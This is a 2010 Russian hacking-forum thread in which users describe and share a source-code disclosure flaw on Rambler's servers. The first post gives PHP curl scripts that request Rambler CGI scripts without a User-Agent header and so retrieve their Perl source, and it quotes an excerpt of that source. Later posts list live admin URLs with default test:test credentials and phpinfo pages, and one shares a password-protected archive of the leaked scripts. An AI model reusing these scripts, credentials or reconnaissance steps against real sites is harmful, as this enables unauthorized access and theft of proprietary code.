Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Некоторые исходники Рамблера. (https://forum.antichat.xyz/showthread.php?t=180214)

m0Hze 19.02.2010 20:37
Некоторые исходники Рамблера.
 
Совсем нечаянно наткнулся сегодня днем,выкладываю сюда в виде мини статьи.
Запускаем тот скрипт,и смотрим на вывод.
PHP код:
<?php
$exec curl_init('http://id.rambler.ru/script/reminder.cgi');
curl_setopt($execCURLOPT_RETURNTRANSFER0);
curl_setopt($execCURLOPT_REFERER'http://id-planet.rambler.ru/default/');
curl_setopt($execCURLOPT_HEADER1);
$page curl_exec($exec);
echo $page;
?>
Запустив скрипт, я был очень удивлен увиденному, а увидел я следующее(приведен лишь отрывок полного кода):

Код:
#!/usr/bin/perl -w # Password reminder for mail.rambler.ru project # Original version by maniac@rambler-co.ru # Rewritten by Maxim Dounin, mdounin@rambler-co.ru # $Id: reminder.cgi,v 1.35 2009/04/02 18:51:47 citrin Exp $ ###############################################################################
use strict;
use warnings;
use utf8;
use CGI qw/ param /;
use Digest::MD5 qw/ md5_hex /;
use Time::HiRes;
use Rambler::CaptchaManager;
use rutils; use r_icq;
use rcfg;
my $H = { myname => 'reminder.cgi', DEBUG => 0, LOG => $rcfg::logdir.'/reminder/reminder_log', # template, used by rutils::print_tmpl TMPL_ROOT => $rcfg::tmpldir, TMPL => 'reminder.tmpl', SKIN => 'id', SKIN_OPT => { DEFAULT => $rcfg::urls{id}, LOGOUT => 'http://www.rambler.ru/', AUTH => $rcfg::urls{id}.'script/auth.cgi', }, # interface charset CHARSET => 'windows-1251', # ratelimits RATE_LOGIN => { rate => 1/3600, burst => 5 }, RATE_IP => { rate => 1/3600, burst => 10 }, RATE_IP_ROBOT => { rate => 1/60, burst => 50 }....
Собственно после несложного мыслительного процесса, я пришел к выводу, что передо мной исходники страницы Восстановление паролей.

А причина то, смешная!

После небольшого танца вокруг Рамблера, было выявлено еще как минимум 5 скриптов, которые можно скачать таким образом, и мне захотелось узнать с чем это связано.Первой мыслью было, что умер интерпретатор Perl, но из браузера я видел вполне нормальный результат работы скрипта, а не его исходник, значит этот вариант отпадает.Посмотрев заголовки отправляемые браузером сервера Рамблера, были поставлены опыты, и выявлено, что Рамблер показывает исходники некоторых скриптов, если к ним обратиться без заголовка User-Agent: ****.
То есть, вот такое обращение к скрипту:

PHP код:
<?php
$header = array('User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8');
$exec curl_init('http://id.rambler.ru/script/reminder.cgi');
curl_setopt($execCURLOPT_RETURNTRANSFER0);
curl_setopt($execCURLOPT_REFERER'http://id-planet.rambler.ru/default/');
curl_setopt($execCURLOPT_HEADER1);
curl_setopt($exec,CURLOPT_HTTPHEADER$header);
$page curl_exec($exec);
echo $page;
?>
вполне нормальное.Увидим результат работы скрипта.Спасебо досвидания.Я отмечать праздники.
Full version статьи!
Всех с наступающим праздником!

XXI 19.02.2010 21:20
Это походу будет работать на всех сайтах с интерпретатором perl

ЗЫ смешно )


Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )

Mr.Replica 19.02.2010 21:24
сэнкс чувак...

-Hormold- 19.02.2010 21:31
Супер! Действительно работает! Если капнуть, то можно скачать около десятка файлов.
Epic fail...

m0Hze 19.02.2010 21:33
Цитата:
Сообщение от XXI
Это походу будет работать на всех сайтах с интерпретатором perl

ЗЫ смешно )


Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )
Fail.

shell_c0de 19.02.2010 22:14
В рамблере остались хоть норм кодеры ? =\
в прошлом году тоже сорцы были в паблике

XXI 19.02.2010 22:16
Ухах. Скоро рамблеров появится докуя


Я уже 40 исходников скатал )

wildshaman 19.02.2010 22:20
Цитата:
Сообщение от XXI
Ухах. Скоро рамблеров появится докуя


Я уже 40 исходников скатал )
Где ты там 40 штук-то нашел?)

TR0J@N 19.02.2010 22:23
Цитата:
Сообщение от wildshaman
Где ты там 40 штук-то нашел?)
Он наверное один и тотже качает) (востановление паса из статьи)

shell_c0de 19.02.2010 22:29
http://in.fo2.rambler.ru/administrator/ Joomla =)
http://ad.rambler.ru/adm/client/ban.adm?cmd=list&item=bn test:test
http://ad.rambler.ru/adm/admin.adm test:test
http://fo2.rambler.ru/info.php phpinfo
Решето ))

shell_c0de 19.02.2010 22:32
http://fo2.rambler.ru/forum/member.php?u=1
Работает на vBulletin® версия 3.7.1

http://fo2.rambler.ru/info.php phpinfo
раскрытые путей /usr/local/www/fo2apps/html/info.php

mailbrush 19.02.2010 22:41
На глазах у меня прикрыли :) Буквально в эту минуту.
PS: На хабре:
Код:
m0Hze
Пользователь заблокирован
С чего бы это?

LBEST. 19.02.2010 22:43
прикрыли :(

][yZ 19.02.2010 23:03
за что мохзика то на хабре забанили?
новасть куль, слить ниуспел(

m0Hze 19.02.2010 23:13
Всем приветы.Обидно конечно,что на хабре дали бан.
Неудобно перед пригласившим,да и вообще как то несправедливо,я ведь ви в суппорт отписал до публицакии :)
Ну да ладно,оно того стоило.

Root-access 21.02.2010 00:22
Непонятна природа этого дебильного косяка... Почему скрипты не исполнялись при отсутствии поля User-Agent?!

m0Hze 21.02.2010 14:59
Цитата:
Сообщение от Root-access
Непонятна природа этого дебильного косяка... Почему скрипты не исполнялись при отсутствии поля User-Agent?!
Кривая настройка сервера,я это уже узнал.Такое еще есть на ихних поддоменах,в некоторых папках.В общем,условие,если нет реферера,или он = 0,то скрипты выдаются как text-plaint.
Ежеле нет,то Add-Type ит.д,и он выполняется.Кривые .htaccess

m0Hze 21.02.2010 15:07
В архиве - 4 скрипта,которые были с/\иtы в первую очередь.Их я выложу.
http://slil.ru/28683765
pwd: antichat
Возможно найдете что то интересное.

xena-mil1 22.02.2010 06:12
такой вопрос: ета бага присутствует только на рамблере или по дефайлту в большынстве перл скриптов?

$n@ke 22.02.2010 15:24
сообщение номер 17.


Время: 14:52